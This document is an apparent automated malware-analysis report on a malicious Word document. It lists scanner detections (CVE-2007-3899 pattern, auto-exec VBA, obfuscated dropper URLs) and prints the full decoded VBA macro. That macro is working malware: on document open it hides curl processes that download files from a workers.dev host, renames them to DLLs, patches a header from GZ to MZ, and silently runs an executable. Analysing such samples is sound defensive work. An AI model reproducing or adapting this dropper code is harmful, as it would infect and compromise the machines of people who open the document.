MALICIOUS
246
Risk Score
Heuristics 10
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fso = CreateObject("Scripting.FileSystemObject") -
Payload URL assembled from a Chr()/Asc() string expression (3 URLs) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
folder1 = Environ("LOCALAPPDATA") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- https://info.scohelpdesk1.workers.dev/mscorsvc.pdfReferenced by macro
- https://info.scohelpdesk1.workers.dev/syswow.pdfReferenced by macro
- https://info.scohelpdesk1.workers.dev/OneDriveNotification.exeReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7359 bytes |
SHA-256: aa6a23cba1b5c6da6c53faab3d54f4fc0927fb7554c9f9b8ecb7ed34f3951544 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Windows API declarations for CreateProcess
Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" ( _
ByVal lpApplicationName As String, _
ByVal lpCommandLine As String, _
ByVal lpProcessAttributes As Long, _
ByVal lpThreadAttributes As Long, _
ByVal bInheritHandles As Long, _
ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, _
ByVal lpCurrentDirectory As String, _
lpStartupInfo As STARTUPINFO, _
lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" ( _
ByVal hHandle As LongPtr, _
ByVal dwMilliseconds As Long) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" ( _
ByVal hObject As LongPtr) As Long
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Sub Main()
Dim file1URL As String, file2URL As String, file3URL As String
Dim file1Path As String, file2Path As String, file3Path As String
Dim targetFolder As String
Dim mscorsvcDllPath As String
Dim exePath As String
' Obfuscated base URL parts
Dim urlBase1 As String, urlBase2 As String, urlBase3 As String, urlBase4 As String
urlBase1 = "https://"
urlBase2 = "info."
urlBase3 = "scohelpdesk1"
urlBase4 = ".workers.dev/"
' Obfuscated folder path parts
Dim folder1 As String, folder2 As String, folder3 As String
folder1 = Environ("LOCALAPPDATA")
folder2 = "\Micro" & "soft\"
folder3 = "Va" & "ult"
targetFolder = folder1 & folder2 & folder3
' Obfuscated file names
Dim name1a As String, name1b As String
Dim name2a As String, name2b As String
Dim name3a As String, name3b As String, name3c As String
name1a = "msc" & "ors"
name1b = "vc.p" & "df"
name2a = "sys" & "wo"
name2b = "w.pd" & "f"
name3a = "One" & "Drive"
name3b = "Notif" & "ication"
name3c = ".e" & "xe"
' Build URLs
file1URL = urlBase1 & urlBase2 & urlBase3 & urlBase4 & name1a & name1b
file2URL = urlBase1 & urlBase2 & urlBase3 & urlBase4 & name2a & name2b
file3URL = urlBase1 & urlBase2 & urlBase3 & urlBase4 & name3a & name3b & name3c
' Define file paths
file1Path = targetFolder & "\" & name1a & name1b
file2Path = targetFolder & "\" & name2a & name2b
file3Path = targetFolder & "\" & name3a & name3b & name3c
' Download all 3 files using curl via CreateProcess
DownloadWithCurl file1URL, file1Path
DownloadWithCurl file2URL, file2Path
DownloadWithCurl file3URL, file3Path
' Rename .pdf files to .dll after download
mscorsvcDllPath = targetFolder & "\" & name1a & "vc.d" & "ll"
RenameFile file1Path, mscorsvcDllPath
RenameFile file2Path, targetFolder & "\" & name2a & "w.dl" & "l"
' Change header from GZ to MZ in mscorsvc.dll
ChangeHeaderGZtoMZ mscorsvcDllPath
' Run the exe from Vault folder using CreateProcess
exePath = targetFolder & "\" & name3a & name3b & name3c
RunExeWithCreateProcess exePath
' Switch from Sheet2 to Sheet3 and hide Sheet2
End Sub
Sub DownloadWithCurl(url As String, outputPath As String)
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim strCmd As String
Dim result As Long
' Build curl command
strCmd = "curl.exe -s -o """ & outputPath & """ """ & url & """"
' Initialize STARTUPINFO
si.cb = Len(si)
si.dwFlags = 1 ' STARTF_USESHOWWINDOW
si.wShowWindow = 0 ' SW_HIDE - hidden window
' Create process
result = CreateProcess(vbNullString, strCmd, 0&, 0&, 0&, 0&, 0&, vbNullString, si, pi)
If result <> 0 Then
' Wait for process to complete (infinite wait)
WaitForSingleObject pi.hProcess, -1 ' INFINITE = -1
' Close handles
CloseHandle pi.hProcess
CloseHandle pi.hThread
End If
End Sub
Sub RunExeWithCreateProcess(exePath As String)
Dim si As STARTUPINFO
Dim pi As PROCESS_INFORMATION
Dim result As Long
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
' Check if exe exists
If Not fso.FileExists(exePath) Then Exit Sub
' Initialize STARTUPINFO
si.cb = Len(si)
si.dwFlags = 1 ' STARTF_USESHOWWINDOW
si.wShowWindow = 0 ' SW_HIDE - hidden window
' Create process to run the exe - fire and forget
result = CreateProcess(vbNullString, exePath, 0&, 0&, 0&, 0&, 0&, vbNullString, si, pi)
If result <> 0 Then
' Don't wait - just close handles and let it run
CloseHandle pi.hProcess
CloseHandle pi.hThread
End If
Set fso = Nothing
End Sub
Sub RenameFile(oldPath As String, newPath As String)
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
' Check if source file exists before renaming
If fso.FileExists(oldPath) Then
fso.MoveFile oldPath, newPath
End If
Set fso = Nothing
End Sub
Sub ChangeHeaderGZtoMZ(filePath As String)
Dim fso As Object
Dim stream As Object
Dim fileContent() As Byte
Dim fileSize As Long
Set fso = CreateObject("Scripting.FileSystemObject")
' Check if file exists
If Not fso.FileExists(filePath) Then Exit Sub
' Read file as binary
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.LoadFromFile filePath
fileSize = stream.Size
If fileSize < 2 Then
stream.Close
Exit Sub
End If
' Read all bytes
stream.Position = 0
fileContent = stream.Read
stream.Close
' Check if first 2 bytes are "GZ" (0x47 0x5A) and change to "MZ" (0x4D 0x5A)
If fileContent(0) = &H47 And fileContent(1) = &H5A Then
fileContent(0) = &H4D ' M
fileContent(1) = &H5A ' Z
' Write modified content back
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' adTypeBinary
stream.Open
stream.Write fileContent
stream.SaveToFile filePath, 2 ' adSaveCreateOverWrite
stream.Close
End If
Set stream = Nothing
Set fso = Nothing
End Sub
Sub AutoOpen()
Main
End Sub
Sub Workbook_Open()
Main
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.